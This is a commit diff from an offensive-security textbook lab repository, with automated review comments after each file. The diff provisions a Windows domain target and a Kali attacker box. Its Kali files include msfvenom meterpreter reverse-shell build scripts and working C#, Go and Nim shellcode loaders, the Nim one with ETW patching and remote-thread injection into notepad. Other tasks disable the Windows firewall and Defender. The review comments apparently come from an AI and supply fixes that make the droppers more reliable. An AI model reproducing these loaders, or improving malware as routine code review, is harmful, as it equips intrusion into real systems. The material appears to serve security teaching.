Merge branch 'main' of github.com:GrayHatHacking/GHHv6
Showing
52 changed files
with
1,358 additions
and
0 deletions.
@@ -0,0 +1,4 @@ | ||
[defaults] | ||
host_key_checking = False | ||
enable_task_debugger = True | ||
|
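Review bot: `host_key_checking = False` under `[defaults]` switches off SSH host-key verification for every host this control node reaches over SSH (the Kali play), so a box that answers on the lab address with a different key is accepted silently; it also tends to get copied verbatim into non-lab configs. If the hosts are rebuilt often, pre-seed a lab-specific known_hosts from the inventory (`ssh-keyscan -H <host> >> known_hosts` and point `[ssh_connection]` `ssh_args` at it) rather than disabling the check globally, or at least add a comment stating this file is for the disposable lab only. `enable_task_debugger = True` drops into the interactive task debugger on any failed task, which will stall an unattended `ansible-playbook` run; leave it off by default and enable it per run with `ANSIBLE_ENABLE_TASK_DEBUGGER=1` when actually debugging.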
@@ -0,0 +1,25 @@ | ||
--- | ||
- hosts: dc | ||
roles: | ||
- common | ||
- windows_dns_server | ||
- windows_domain_controller | ||
- windows_domain_users_groups | ||
vars_files: | ||
- vars/vars.yml | ||
- vars/users.yml | ||
- hosts: target | ||
gather_facts: yes | ||
roles: | ||
- common | ||
- windows_client_join_domain | ||
- target_customizations | ||
vars_files: | ||
- vars/vars.yml | ||
- hosts: kali | ||
become: yes | ||
roles: | ||
- kali_customizations | ||
vars_files: | ||
- vars/vars.yml | ||
- vars/users.yml |
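Review bot: `vars/users.yml` is loaded by both the `dc` and the `kali` plays and is consumed by `windows_domain_users_groups`, so it presumably holds the lab account names and passwords in clear text; nothing in the playbook indicates it is vault-encrypted, and this repository is public. `ansible-vault encrypt vars/users.yml` (or `!vault` inline values for just the password fields) with the vault password file kept out of git prevents those credentials landing in history, even if they are only lab defaults. The `kali` play also applies the whole `kali_customizations` role with `become: yes`, which means the payload build scripts that role ships run as root; if only the package and Samba steps need privilege, `become` is better set on those tasks than on the play.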
@@ -0,0 +1,2 @@ | ||
--- | ||
|
@@ -0,0 +1 @@ | ||
--- |
@@ -0,0 +1,16 @@ | ||
--- | ||
galaxy_info: | ||
role_name: install_misc_software | ||
author: Russ Nolen rnolen@splunk.com | ||
description: Install some basic software | ||
license: BSD | ||
min_ansible_version: 2.4 | ||
platforms: | ||
- name: Windows | ||
versions: | ||
- 2012R2 | ||
- Win10 | ||
galaxy_tags: | ||
- system | ||
- security | ||
dependencies: [] |
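--- a/ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml
+++ b/ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml
@@ -0,0 +1,7 @@
+---
+- name: Install Chocolately via Powershell
+win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex
+"
+- name: Install notepadplusplus
+win_chocolatey:
+name: notepadplusplus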
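Review bot: The first task pipes whatever `https://chocolatey.org/install.ps1` serves straight into `iex` with nothing pinning the script, and it is not idempotent: the download and re-install run every time the play is applied, because `win_shell` has no way to know Chocolatey is already there. As far as I recall `win_chocolatey` bootstraps Chocolatey itself when `choco.exe` is missing, so the `win_shell` task can usually be dropped; if it is kept for the TLS 1.2 tweak, add `args:` / `creates: C:\ProgramData\chocolatey\bin\choco.exe` so it runs once, and prefer fetching the installer with `win_get_url` plus a `checksum:` before executing it. The task name also misspells Chocolatey as `Chocolately`.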
@@ -0,0 +1,9 @@ | ||
--- | ||
# need to wrap an if statement around this one | ||
# make it windows specific | ||
- name : Disable Windows Firewall | ||
win_firewall: | ||
state: disabled | ||
- include: windows-disable-defender.yml | ||
when: ansible_distribution is search ('Microsoft') | ||
- include: chocolatey-components.yml |
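Review bot: The `Disable Windows Firewall` task runs unconditionally while the Defender include right below it is guarded by `when: ansible_distribution is search ('Microsoft')`, and the two comments above the task admit the guard is still missing; attached to any non-Windows host the role aborts there, since `win_firewall` only has a PowerShell implementation. Put the same `when:` on the firewall task and on the chocolatey include, which is Windows-only as well, or guard the whole file once with `ansible_os_family == 'Windows'`. Separately, the bare `include:` keyword has been deprecated since Ansible 2.4 and is removed in ansible-core 2.16, so `include_tasks:` is the form that keeps working.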
@@ -0,0 +1,6 @@ | ||
--- | ||
- name: Install the Visual C++ Redistributable | ||
win_package: | ||
path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe" | ||
product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}' | ||
arguments: /install /passive /norestart |
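Review bot: The Visual C++ installer is fetched from the Microsoft download URL by `win_package` and executed as-is; the `product_id` only makes the task idempotent, it does not verify what was downloaded, and as far as I can see `win_package` has no checksum option for URL paths. Splitting this into `win_get_url` with a `checksum: sha256:<known-good digest>` followed by `win_package` on the local file gives a verified install and keeps working once the file is cached offline. Minor: `/passive` still shows a progress UI on an interactive session; `/quiet` is the usual choice for unattended provisioning.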
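--- a/ch07/Lab/ansible/roles/common/tasks/windows-disable-defender.yml
+++ b/ch07/Lab/ansible/roles/common/tasks/windows-disable-defender.yml
@@ -0,0 +1,8 @@
+---
+
+- name: Disable Windows Defender
+win_regedit:
+key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
+value: DisableRealTimeMonitoring
+datatype: dword
+data: 1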
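Review bot: The task is named `Disable Windows Defender`, but the only change is `DisableRealTimeMonitoring` under the Real-Time Protection policy key, which turns off on-access scanning and leaves scheduled scans, cloud-delivered protection and the service itself running; if the lab depends on the droppers built elsewhere in this commit surviving on the target, say so in the task name or a comment, and consider the companion `DisableAntiSpyware` value under `HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender`. On Windows 10 builds with Tamper Protection enabled, policy-based real-time protection changes are, as far as I know, ignored, so the role should confirm the setting took effect (for example `Get-MpComputerStatus` via `win_shell` and a `failed_when`). Minor: `key:` and `value:` are, I believe, legacy aliases of `win_regedit`'s `path:` and `name:` parameters.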
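--- a/ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt
@@ -0,0 +1,8 @@
+[ghh]
+comment = GHH Share
+browseable = yes
+path = /tmp
+printable = no
+guest ok = yes
+read only = yes
+create mask = 0700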
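Review bot: The `[ghh]` share exports the Kali box's whole `/tmp` as a guest-readable share, so every file any local user or tool drops there becomes readable to anyone on the lab network, not just the droppers the build scripts write to `/tmp`; `read only = yes` blocks writes but not disclosure. Point the share at a dedicated directory that the build scripts also write to (for example `path = /srv/ghh`) so only intended artifacts are exposed. `create mask = 0700` has no effect on a read-only share and can go.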
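--- a/ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch
@@ -0,0 +1,10 @@
+--- /usr/share/kaboxer/covenant.kaboxer.orig 2021-09-12 19:28:35.392506176 +0000
++++ /usr/share/kaboxer/covenant.kaboxer.yaml 2021-09-12 18:54:26.224293412 +0000
+@@ -26,6 +26,7 @@
+publish_ports:
+- 7443
+- 443
++ - 80
+before_run_script: |
+#!/bin/sh
+set -e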
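--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/build_csharp.sh
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/build_csharp.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+
+SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`
+
+# Replae relevant lines
+SC=${SC/buf/shellcode}
+
+PRE=`grep -B 1000 INJECT csharp.template | grep -v INJECT`
+POST=`grep -A 1000 INJECT csharp.template | grep -v INJECT`
+
+# Format the output
+echo "$PRE" > csharp.cs
+echo "$SC" >> csharp.cs
+echo "$POST" >> csharp.cs
+
+mcs csharp.cs -out:/tmp/csharp_dropper64.exe
+chmod 755 /tmp/csharp_dropper64.exe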
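Review bot: The script has no `set -e` and never checks `msfvenom`, so when it fails (Metasploit missing, bad payload name) `$SC` is empty and `mcs` is still run on a template with no `shellcode` array, giving a confusing compile error instead of a clear failure; `set -euo pipefail` at the top and `[ -n "$SC" ] || { echo 'msfvenom failed' >&2; exit 1; }` after the capture fix that. `LHOST=10.0.0.40` is hard-coded here and again in the Go and Nim build scripts; `LHOST="${LHOST:-10.0.0.40}"` and `LPORT="${LPORT:-4444}"` read from the environment keep the three in sync and let the lab be re-addressed without editing them. The `grep -B 1000 INJECT` split also silently truncates a template longer than 1000 lines; `sed '/INJECT/,$d'` and `sed '1,/INJECT/d'` do it without a magic number.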
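--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/build_go.sh
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/build_go.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+
+SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.40`
+CODE=`cat go.template`
+# Replae relevant lines
+CODE=${CODE/INJECT/$SC}
+echo "$CODE" > createFiber.go
+
+GOOS=windows GOARCH=amd64 go build -o /tmp/CreateFiber.exe createFiber.go
+chmod 755 /tmp/CreateFiber.exe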
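Review bot: Neither `msfvenom` nor `go build` is checked for success and the `${CODE/INJECT/$SC}` substitution happens regardless, so an empty `$SC` produces a `CreateFiber.exe` whose decoded `shellcode` slice is empty; the template then dereferences `&shellcode[0]` and panics on the target at run time instead of the build failing here. Add `set -euo pipefail` and `[ -n "$SC" ] || exit 1` before the substitution. The module is declared as `createFiber.go` in go.mod, which compiles but reads as a filename; a plain module path such as `ghh/createfiber` is the convention.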
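--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/build_nim.sh
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/build_nim.sh
@@ -0,0 +1,19 @@
+#!/bin/bash
+
+SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`
+
+# Replae relevant lines
+ORIG="byte[] buf = new byte["
+FIX="var shellcode: array["
+SC=${SC/$ORIG/$FIX}
+SC=${SC/]/,byte] = }
+SC=${SC/\}/]}
+SC=${SC/{/\[ byte }
+SC=${SC/;/}
+SC=${SC/\[ \[/\[}
+SC=${SC//[$'\n']}
+CODE=`cat nim.template`
+CODE=${CODE/INJECTHERE/$SC}
+echo "$CODE" > dropper.nim
+
+nim c -d=mingw -b=cpp --passL="-static-libgcc -static-libstdc++" --app=console --cpu=amd64 --out=/tmp/nim_dropper64.exe dropper.nim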
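Review bot: The script reads `nim.template`, but the Nim template shipped next to it in this commit is `execute.template`, and that is the file carrying the `INJECTHERE` marker this substitution looks for; unless a `nim.template` is among the files not shown here, `cat nim.template` fails and `dropper.nim` is written with an empty body. Use `CODE=$(cat execute.template)` (or rename the template) and add `set -euo pipefail` so a missing file or a failed `msfvenom` stops the script instead of handing `nim c` garbage. The chain of `${SC/…}` rewrites also depends on the exact layout of msfvenom's C# output, so a sanity check such as `grep -q 'var shellcode: array' dropper.nim || exit 1` after the write would catch a format change early.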
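--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/csharp.template
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/csharp.template
@@ -0,0 +1,45 @@
+using System;
+using System.Runtime.InteropServices;
+
+
+namespace GHHSCLauncher
+{
+class Program
+{
+private static UInt32 MEM_COMMIT = 0x1000;
+private static UInt32 PAGE_READWRITE = 0x04;
+private static UInt32 PAGE_EXECUTE = 0x10;
+
+[DllImport("kernel32")]
+private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
+
+[DllImport("kernel32")]
+static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
+
+[DllImport("kernel32")]
+private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );
+
+[DllImport("kernel32")]
+private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds);
+
+static void Main()
+{
+INJECT
+
+
+UInt32 scAddress = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
+Marshal.Copy(shellcode, 0, (IntPtr)(scAddress), shellcode.Length);
+uint prot;
+VirtualProtect((IntPtr)(scAddress), shellcode.Length, PAGE_EXECUTE, out prot);
+IntPtr hThread = IntPtr.Zero;
+UInt32 threadId = 0;
+IntPtr pinfo = IntPtr.Zero;
+
+
+hThread = CreateThread(0, 0, scAddress, pinfo, 0, ref threadId);
+WaitForSingleObject(hThread, 0xFFFFFFFF);
+return;
+}
+
+}
+}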
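Review bot: The P/Invoke signatures model pointers as `UInt32` — `VirtualAlloc` returns `UInt32` and takes `UInt32 lpStartAddr`, `CreateThread` takes `UInt32 lpStartAddress` — yet build_csharp.sh compiles this as `csharp_dropper64.exe` with an x64 payload, and in a 64-bit process those values are 8 bytes wide, so an allocation that lands above 4 GiB can be truncated before `Marshal.Copy` and `CreateThread` ever see it. Use `IntPtr`/`UIntPtr` for every pointer-sized argument and return value, and test the results: a `VirtualAlloc` of `IntPtr.Zero` or a `VirtualProtect` returning false are currently ignored and the program carries on to `CreateThread`. `Main`'s `INJECT` line is filled in by the build script; the rest of the class is unchanged below.
```csharp
[DllImport("kernel32", SetLastError = true)]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32", SetLastError = true)]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

// … unchanged: VirtualProtect and WaitForSingleObject imports, INJECT placeholder …

IntPtr scAddress = VirtualAlloc(IntPtr.Zero, new UIntPtr((uint)shellcode.Length), MEM_COMMIT, PAGE_READWRITE);
if (scAddress == IntPtr.Zero) return;
Marshal.Copy(shellcode, 0, scAddress, shellcode.Length);
uint prot;
if (!VirtualProtect(scAddress, shellcode.Length, PAGE_EXECUTE, out prot)) return;
// … unchanged: hThread / threadId / pinfo locals …
hThread = CreateThread(IntPtr.Zero, 0, scAddress, pinfo, 0, ref threadId);
```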
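--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/execute.template
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/execute.template
@@ -0,0 +1,94 @@
+import winim/lean
+import strformat
+import dynlib
+import osproc
+
+const patch: array[1, byte] = [byte 0xc3]
+
+proc Patchntdll(): bool =
+var
+ntdll: LibHandle
+cs: pointer
+op: DWORD
+t: DWORD
+disabled: bool = false
+
+ntdll = loadLib("ntdll")
+if isNil(ntdll):
+echo "[X] Failed to load ntdll.dll"
+return disabled
+
+cs = ntdll.symAddr("EtwEventWrite") # equivalent of GetProcAddress()
+if isNil(cs):
+echo "[X] Failed to get the address of 'EtwEventWrite'"
+return disabled
+
+if VirtualProtect(cs, patch.len, 0x40, addr op):
+echo "[*] Applying patch"
+copyMem(cs, unsafeAddr patch, patch.len)
+VirtualProtect(cs, patch.len, op, addr t)
+disabled = true
+
+return disabled
+
+
+proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
+
+# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
+let tProcess = startProcess("notepad.exe")
+tProcess.suspend() # That's handy!
+defer: tProcess.close()
+
+echo "[*] Target Process: ", tProcess.processID
+
+let pHandle = OpenProcess(
+PROCESS_ALL_ACCESS,
+false,
+cast[DWORD](tProcess.processID)
+)
+defer: CloseHandle(pHandle)
+
+echo "[*] pHandle: ", pHandle
+
+let rPtr = VirtualAllocEx(
+pHandle,
+NULL,
+cast[SIZE_T](shellcode.len),
+MEM_COMMIT,
+PAGE_EXECUTE_READ_WRITE
+)
+
+var bytesWritten: SIZE_T
+let wSuccess = WriteProcessMemory(
+pHandle,
+rPtr,
+unsafeAddr shellcode,
+cast[SIZE_T](shellcode.len),
+addr bytesWritten
+)
+
+echo "[*] WriteProcessMemory: ", bool(wSuccess)
+echo " \\-- bytes written: ", bytesWritten
+echo ""
+
+let tHandle = CreateRemoteThread(
+pHandle,
+NULL,
+0,
+cast[LPTHREAD_START_ROUTINE](rPtr),
+NULL,
+0,
+NULL
+)
+defer: CloseHandle(tHandle)
+
+echo "[*] tHandle: ", tHandle
+echo "[+] Injected"
+
+INJECTHERE
+
+# This is essentially the equivalent of 'if __name__ == '__main__' in python
+when isMainModule:
+var success = Patchntdll()
+echo fmt"[*] ETW blocked by patch: {bool(success)}"
+injectCreateRemoteThread(shellcode)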
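Review bot: `injectCreateRemoteThread` never acts on what the Win32 calls return: `rPtr` from `VirtualAllocEx` is handed to `WriteProcessMemory` and `CreateRemoteThread` even when it is `NULL`, `wSuccess` and `bytesWritten` are only echoed, and `tHandle` is printed rather than tested, so a failed step still ends with `[+] Injected`. Add `if rPtr.isNil: quit("[X] VirtualAllocEx failed", 1)` after the allocation and `if not bool(wSuccess) or bytesWritten != cast[SIZE_T](shellcode.len): quit("[X] WriteProcessMemory failed", 1)` after the write, and treat a zero `tHandle` the same way. In `Patchntdll` the second `VirtualProtect`, the one restoring the original protection, also discards its result. The notepad process is suspended and never resumed; that is presumably intentional, since I believe a thread created with `CreateRemoteThread` runs regardless of the suspended primary thread, but a comment saying so would spare the next reader the question.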
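--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/go.mod
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/go.mod
@@ -0,0 +1,5 @@
+module createFiber.go
+
+go 1.15
+
+require golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect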
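--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/go.sum
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/go.sum
@@ -0,0 +1,2 @@
+golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY=
+golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=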
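--- a/ch07/Lab/ansible/roles/kali_customizations/files/shells/go.template
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/shells/go.template
@@ -0,0 +1,87 @@
+// Inspired by ired.team and Ne0nd0g's go-shellcode repository
+// Reference: https://github.com/Ne0nd0g/go-shellcode
+// Reference: https://ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber
+
+
+package main
+
+// import modules we'll need. We will need unsafe and the windows libraries to be able to
+// launch shellcode. The winddows library let's us use DLLs and unsafe bypasses go
+// restrictions around casting so that we can execute code
+
+import (
+"encoding/base64"
+"fmt"
+"unsafe"
+"golang.org/x/sys/windows"
+)
+
+// Constants that we will need
+const (
+_MEM_COMMIT = 0x1000
+_MEM_RESERVE = 0x2000
+_PAGE_RWX = 0x40
+)
+
+func main() {
+
+
+// shellcode in base64
+sc := "INJECT"
+
+shellcode, err := base64.StdEncoding.DecodeString(sc)
+if err != nil {
+fmt.Sprintf("Base64 Decoding Error: %s", err.Error())
+return
+}
+
+// Load dlls
+kernel32 := windows.NewLazySystemDLL("kernel32.dll")
+ntdll := windows.NewLazySystemDLL("ntdll.dll")
+
+// memory creation/copy routines
+VirtualAlloc := kernel32.NewProc("VirtualAlloc")
+RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
+
+// Fiber creation routines
+ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber")
+CreateFiber := kernel32.NewProc("CreateFiber")
+SwitchToFiber := kernel32.NewProc("SwitchToFiber")
+
+// Only fibers can scedule fibers, so this convers the main thread into a fiber
+_, _, err = ConvertThreadToFiber.Call()
+
+if err != nil && err.Error() != "The operation completed successfully." {
+fmt.Sprintf("ConvertThreadToFiber Failed: %s", err.Error())
+return
+}
+
+// Create memory for our shellcode
+addr, _, err:= VirtualAlloc.Call(0, uintptr(len(shellcode)), _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX)
+
+if ((err != nil && err.Error() != "The operation completed successfully.") || addr == 0) {
+fmt.Sprintf("VirtualAlloc Failed:%s", err.Error())
+return
+}
+
+// Copy shellcode to our newly created memory
+_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
+
+if err != nil && err.Error() != "The operation completed successfully." {
+fmt.Sprintf("RtlCopyMemory Failed:%s", err.Error())
+return
+}
+
+// Create Fiber to execute shellcode
+fiber, _, err:= CreateFiber.Call(0, addr, 0)
+
+if err!= nil && err.Error() != "The operation completed successfully." {
+fmt.Sprintf("CreateFiber Failed:%s", err.Error())
+return
+}
+
+// Switch to Fiber
+SwitchToFiber.Call(fiber)
+
+
+}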
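Review bot: Every error branch in `main` formats a message with `fmt.Sprintf` and discards it, so a failing `ConvertThreadToFiber`, `VirtualAlloc`, `RtlCopyMemory` or `CreateFiber` returns silently (`go vet` flags the unused result); `fmt.Println` would at least surface it. The success test `err.Error() != "The operation completed successfully."` is fragile as well — `LazyProc.Call` always returns a `syscall.Errno`, and its text can differ on a Windows without the English message table — whereas comparing against `windows.ERROR_SUCCESS` is exact. The decoded payload is also never checked for length before `&shellcode[0]`, which panics on a zero-length slice, the case an empty `INJECT` substitution in build_go.sh produces.
```go
// callFailed reports whether a LazyProc.Call result is a real error:
// Call always returns a non-nil error, and ERROR_SUCCESS means "none".
func callFailed(err error) bool {
	return err != nil && err != windows.ERROR_SUCCESS
}

// … inside main, after the base64 decode …
if len(shellcode) == 0 {
	fmt.Println("empty shellcode: INJECT was not replaced")
	return
}
// … unchanged: DLL and proc lookups …
_, _, err = ConvertThreadToFiber.Call()
if callFailed(err) {
	fmt.Println("ConvertThreadToFiber failed:", err)
	return
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX)
if callFailed(err) || addr == 0 {
	fmt.Println("VirtualAlloc failed:", err)
	return
}
// … same pattern for RtlCopyMemory and CreateFiber; SwitchToFiber unchanged …
```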